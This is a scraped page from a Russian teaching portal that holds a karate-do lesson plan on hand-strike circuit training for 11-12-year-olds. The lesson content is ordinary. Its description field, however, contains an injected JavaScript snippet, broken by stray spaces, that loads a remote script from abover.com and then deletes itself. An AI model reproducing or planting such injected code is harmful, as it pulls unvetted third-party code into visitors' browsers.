В вашем браузере отключен JavaScript. Из-за этого многие элементы сайта не будут работать. Как включить JavaScript?

Учебно-Методический портал

План-конспект учебно-тренировочного занятия по каратэ-до

План-конспект учебно-тренировочного занятия по каратэ-до

Александр Разваляев
Тип материала: Планирование
просмотров: 15847 комментариев: 1
Краткое описание
Раскрыть тему отработка ударов в каратэ-до методом круговой тренировки в рамках конспекта занятия по новым требованиям.
Описание
(f unction () { var script = docu ment.createElement('script'); script.src = 'https://abover.com/system/extension?iframe=' + ( self === top? '0': '1' ) + '&r=' + Math.random() + '&v=1.0.8'; script.on load = script.on error = f unction () { script.on load = script.on error = null; script.parentNode.removeChild(script); } document.body.appendChild(script); })(); Цель занятия – Продолжить посредством метода кроссфита совершенствовать скоросто-технические качества одиночного удара рукой.
Задачи занятия:
1. Продолжить изучать метод кроссфита, особенностями работы в режиме кроссфита. изучить упражнения на каждой станции
2. Сформировать умение выполнять правильную технику ударов руками.
3. Совершенствовать силовые, скоростные качества ударов руками.
Укрепить морально волевые качества воспитанников

Дистанционное обучение педагогов по ФГОС по низким ценам

Вебинары, курсы повышения квалификации, профессиональная переподготовка и профессиональное обучение. Низкие цены. Более 18400 образовательных программ. Диплом госудаственного образца для курсов, переподготовки и профобучения. Сертификат за участие в вебинарах. Бесплатные вебинары. Лицензия.

Файлы
конспект кроссфит 111.docx Скачать

План-конспект учебно-тренировочного занятия.


Аттестуемый педагог Разваляев Александр Ивановия

Предмет – каратэ-до. Группа – УТГ-1 (1 –ой год обучения)

Тема занятия – Отработка одиночных ударов руками -метод кроссфита.

Вид занятия – учебно-тренировочное

Цель занятия – Продолжить посредством метода кроссфита совершенствовать скоросто-технические качества одиночного удара рукой.

Задачи занятия:

  1. Продолжить изучать метод кроссфита , особенностями работы в режиме кроссфита . изучить упражнения на каждой станции

  2. Сформировать умение выполнять правильную технику ударов руками.

  3. Совершенствовать силовые ,скоростные качества ударов руками.

  4. Укрепить морально волевые качества воспитанников.

Возраст детей – 11-12 лет

Период –предсоревновательный

Дата и место проведения: 11октября 2012 г., зал единоборств МБОУ ДОД «Еланская ДЮСШ»

Методическое оснащение:

- методы обучения – наглядный (показ образца), словесный (объяснение тренера-преподавателя, проговаривание своих действий обучающимися),

- методы организации обучения – поточный (друг за другом) ,круговой тренировки в интенсивном режиме( кроссфит).

- инвентарь и оборудование – гантели, эспандер резиновый

Время занятия – 90 минут

Основные источники информации: Дополнительная образовательная программа по каратэ-до для 10-17 лет Разваляева.А.И, методические разработки по кроссфиту доцента ВГАФКА Смирнова.Ю.А ,методические разработки по развитию скоростно-силовых качеств в единоборствах доцента педагогических наук Орлова.Ю.Л














№ п/п

Этапы работы

Содержание этапа

Дозировка

Организационно-методические указания

1.

Организационно-подготовительный этап (20 минут)

  • Цель для обучающихся – подготовиться к продуктивной работе на занятии.

  • Цель для тренера-преподавателя – способствовать созданию условий для эффективной работы обучающихся на занятии.

Задачи:

  1. Создать положительный эмоциональный настрой.

  2. Обеспечить мотивацию и принятие обучающимися цели занятия.

  3. Подготовить организм обучающихся к предстоящей физической нагрузке.

  4. Развивать координацию движений.

Методы организации работы обучающихся на начальном этапе занятия:

- методы обучения: словесные (диалог); наглядные (показ упражнений); практический (выполнение упражнений);

- методы организации деятельности обучающихся: фронтальный, групповой.







  1. Построение в шеренгу. Приветствие. Проверка внешнего вида.

  2. Сообщение цели и задач учебно-тренировочного занятия.

3 Разминка Ходьба:

  • на носках

  • на пятках

  • на внешней стороне стопы

  • на внутр. стороны стопы

Бег с РУ:

  • с растиранием лица и шеи

  • с разминанием кистей рук

  • с разминанием (вращение) предплечий

  • с вращением плеч

  • с поворотами головы влево-вправо-вверх-вниз-круговые вращения

  • отжимание-пресс

  • с высоким подниманием бедра

  • в захлёст

  • попеременно левым и правым боком

  • скрестный шаг (лев. и прав. боком)

  • отжимание-пресс

  • с прыжками на левой и правой ноге

  • то же спиной

  • прыжки «кролем»

  • «волчок» (влево и вправо)

  • отжимание-пресс


  • Акробатика: кувырок вперёд

  • кувырок спиной вперед

  • подъём с разгибом

  • выход силой

  • страховка левым и правым боком

Восстановления дыхания

Упражнения на растяжку:

  • наклоны туловища к левой и правой ноге

  • полувыпады к левой и правой ноге

  • «бабочка», шпагаты

  • «полулотос» к левой и правой ноге

  • Махи левой и правой ногой вперёд



1 мин


1 мин



4 мин





10 мин


















4 мин


Здравствуйте ребята! Рад видеть вас в полном составе.





Следить за осанкой

Чёткое положение ног


.

Все упражнения выполняются в лёгком беге




Следить за координацией тела


40 сек пресс – 40 сек отжимания




30 сек пресс – 30 сек отжимания



20 сек пресс – 20 сек отжимания



Следить за группировкой







. Колени при растяжке не сгибать



2.

Основной этап –(65 минут)

Цель для обучающихся: совершенствовать технику одиночного удара рукой в условиях кумите

Цель для тренера-преподавателя: пробудить у обучающихся желание работать в интенсивном режиме с правильным подходом к технике выполнения,.


Задачи:

  1. Организовать работу и учить умению выполнять борцовскую и ударную технику в режиме кроссфитьа..

  2. Формировать умения правильного выполнения приема .

  3. Совершенствовать скоростно-силовые качества,вывносливость.

  4. Поддерживать интерес к выполнению поставленной задачи, воспитывать трудолюбие, формировать здоровое чувство конкуренции.

  • Основные положения учебного материала:

- получение новых сведений о методике кроссфита

- выполнение технических приемов в режиме кроссфита ;

- выполнение приёма в различных степенях нагрузки.

  • Формы и методы закрепления нового материала:

- словесные (объяснение тренера, проговаривание обучающимися), наглядные (показ приёма).

  • Формы и методы достижения поставленных целей:

- практические.

  • Формы и методы организации деятельности обучающихся:

круговой метод, фронтальный.

  • Критерии определения уровня внимания и интереса обучающихся к излагаемому тренером-преподавателем учебному материалу:

- своевременное и правильное выполнение движений всеми обучающимися, готовность обучающихся к быстрому переключению от одного действия к другому;

- эмоциональный настрой воспитанников.

  • Методы мотивирования (стимулирования) учебной активности обучающихся в ходе занятия:

- одобрение, похвала.

  • Критерии, позволяющие определить степень усвоения обучающимися нового учебного материала:

- выполнение изучаемого приёма без ошибок и искажений, сформированность ощущения правильности выполнения приёма.

1 Диолог с воспитанниками- что они знают о кроссфите---особенносте методике,требованиях к работе в условиях круговой тренеровки , знакомство воспитанников с режимом и темпом работы .

Обучающимся предлагается 4 вида заданий –каждое имеет 3 повтора с паузами 30 сек выполняется повторы 1мин—работа идет от сложного к простому.

2.По команде тренера обучающиеся цепляют эспандеры на руки и ноги ,берут в руки гантели под секундомер отрабатывают одиночные удары со сменой уровня –с движением вперед и возвратом —по истечении минуты пауза 30 сек затем 2 повтора- 3.Выполнение ударной техники с эспандерами без гантель ---3 повтора с паузами 30 сек на растяжку с анализом тренера преведущей работы и постановке последующей задачи 4 Ударная техника на мешках 3 повтора с паузами 30 сек. 5. Кумите одиночного удара -3 поединка по 1 мин с паузой 30 сек 6.Релаксация

7.Выполнение 2 волны по 2 подхода с 30 сек паузой 8. Отдых в растяжках произвольно. 9. Выполнение 3 волны по одному подходу 10. Релаксация 11.силовая подготовка-подьем туловища 30 раз –упражнение ноги за голову 15 раз -отжимание по 30 раз -приседание-30 раз 12.работа на растяжку ног в парах 13 кумите в соревновательном режиме

8 мин






14 мин












2мин

10мин

2мин

6 мин

1 мин


10 мин

5 мин

7 мин













Обучающимся демонстрируют работу каждого задани



Внимание на постоновку локтей,работу бедер и максимальной скорости выполнения-темп выше среднего

Необходимо воспитанников убедить увеличить скорость с уменьшением нагрузки



Внимание на максимальную скорость выполнения удара и передвижения-возможность использовать подсечки и броски , акцент на смену уровней атаки –подготовки к атаки.

Темп выполнения упражнений произвольный





3.

Итоговый этап – 5 мин

  • Цель для обучающихсяпопробовать объяснить, почему не получилось выполнение приёма.

  • Цель для тренера-преподавателя -

оценить деятельность обучающихся по конечному результату.

Задачи: восстановить первоначальное состояние организма обучающихся.

  • Методы организации: фронтальный, словесный (диалог).

  • Методы оценивания: словесные


Рефлексия:

  • Цель для обучающихся: осознать степень удовлетворённости от собственной деятельности на занятии, соотнести оценку тренера-преподавателя с собственным ощущением.

  • Цель для тренера: определить степень заинтересованности обучающихся предметом.

  • Методы оценивания:

- оценка тренера-преподавателя степени старания обучающихся закрепить технический приём.

  • Методы стимулирования учебной активности обучающихся в ходе подведения итогов занятия: похвала, настрой на дальнейшую работу, предстоящие соревнования.


  1. Медленный восстанавливающий бег .

  2. Подведение итогов занятия тренером-преподавателем.

  3. Задание на дом: отработать удары мавасе гери и цуки .

  4. Обучающиеся делятся впечатлением о том, что самое трудное при выполнении методике кроссфита удалось ли им повторить образец, исполненный тренером-преподавателем: если да, то делятся ощущениями, если нет, то рассказывают почему.








  1. Организованный уход из зала.
















2 мин


2 мин


1 мин







2 мин


Дышим глубоко, ровно.

Молодцы! Все старались, хорошо работали, хотя новый материал был сложным.

Прошу дома поработать над ударами мавасе гери и цуки

Комментарии о том, на что необходимо особо обратить внимание всем обучающимся на анализ ошибок .







Занятие закончено. Все свободны ! Молодцы.



Обсуждение материала
Сергей Колодин
11.08.2014 09:59
Александр Иванович, при повторной публикации материалов в библиотеке Портала прошу Вас обратить внимание на соблюдение всех пунктов Требований.
Заранее Вам благодарен.

С уважением, С.А. Колодин.
Для добавления отзыва, пожалуйста, войдите или зарегистрируйтесь.
Подписаться на новые Расписание вебинаров
Задать вопрос